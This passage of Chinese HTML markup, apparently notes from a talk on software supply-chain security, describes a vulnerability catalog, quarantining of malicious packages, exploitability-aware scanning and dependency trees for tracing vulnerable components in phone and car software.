Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 创建了一个大型云数据库（Catalog），记录了互联网上所有开源软件的版本和漏洞信息。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 研发人员可以在不下载包的情况下，通过查询Catalog来了解特定版本是否存在漏洞。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 在外网和内网之间，提供了一个隔离区curation，可以阻止恶意包进入公司内网。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 允许用户通过配置策略来限制，如特定版本的软件包或Docker镜像的使用，如阻止下载旧版本的操作系统（例如Ubuntu 20.04以下版本或CentOS 7）。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 这种方法可以阻挡禁用的CVE包和许可证引入产品。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 这些功能有助于企业降低运维风险，并可能带来显著的研发成本收益。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">高级扫描套件：精准识别可利用漏洞</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. “当前漏洞扫描工具存在大量误报，导致开发人员</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">对漏洞警告麻木和无助</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">”</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. &#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">高级扫描</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">套件，支持源代码扫描，基于上下文分析，确认漏洞是否可被利用，支持秘钥泄露检查，精准弹窗高级。&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="font-size: 12pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;font-family: &#34;微软雅黑 Light&#34;;color: rgb(0, 0, 0);">3. &#34;我们把安全扫描移到最左侧，就是在IDE的工具里面进行扫描，这个功能</span><span style="font-size: 12pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;font-family: &#34;微软雅黑 Light&#34;;color: rgb(250, 0, 0);">我们的用户非常的喜欢</span><span style="font-size: 12pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;font-family: &#34;微软雅黑 Light&#34;;color: rgb(0, 0, 0);">。&#34;</span></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. &#34;Docker Hub社区里面，100个最常见的CVE漏洞里面，有74%的漏洞实际上是不可被利用的。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. &#34;对一个2,800人的团队来说，每年能节省80万美金。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术：构建软件依赖关系树</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">“实际上我们最终做的事情一定是要</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">从解决某个问题开始</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">！&#34; （问题组件溯源、影响分析、召回），</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">那怎么做这个溯源你又不想所有的用户都去通知一遍，对吧？，</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">构建依赖关系树，让安全漏洞无处遁形，实现从组件到用户的全链条追溯。</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">1. 企业需要从实际需求和痛点出发，解决软件供应链安全问题。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 以手机和汽车为例，镜像文件中的APK或ECU软件可能存在安全漏洞，需要有效管理。</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 构建镜像（手机镜像、非docker）依赖关系树，可以帮助企业追踪和管理软件供应链中的安全问题。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 依赖关系树能够在漏洞爆发时快速定位受影响的用户，实现精准溯源和通知。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 投入建立软件供应链追踪系统是值得的，能够帮助企业更好地应对未来可能出现的安全漏洞。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 平衡软件供应链安全和创新需要企业建立有效的管理机制，既保证安全性，又不影响创新进程。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{llm</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">增补</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">}构建依赖关系树的基本方法</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 识别组件：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>对于手机，识别镜像文件中包含的所有APK。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>对于汽车，识别所有的ECU（电子控制单元）和相关软件。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 建立关系：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>分析每个APK或软件组件之间的依赖关系。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>确定哪些组件依赖于其他组件，形成一个层级结构。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 记录版本信息：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>为每个组件记录详细的版本信息，以便追踪特定版本的问题。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 链接到最终产品：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>将依赖关系树与最终产品（如特定型号的手机或汽车）关联起来。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 实现追溯机制：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>建立一个系统，能够从任何一个组件快速追溯到受影响的最终产品。</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 持续更新：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>随着软件更新或新版本发布，不断更新依赖关系树。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">7. 集成安全检测：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 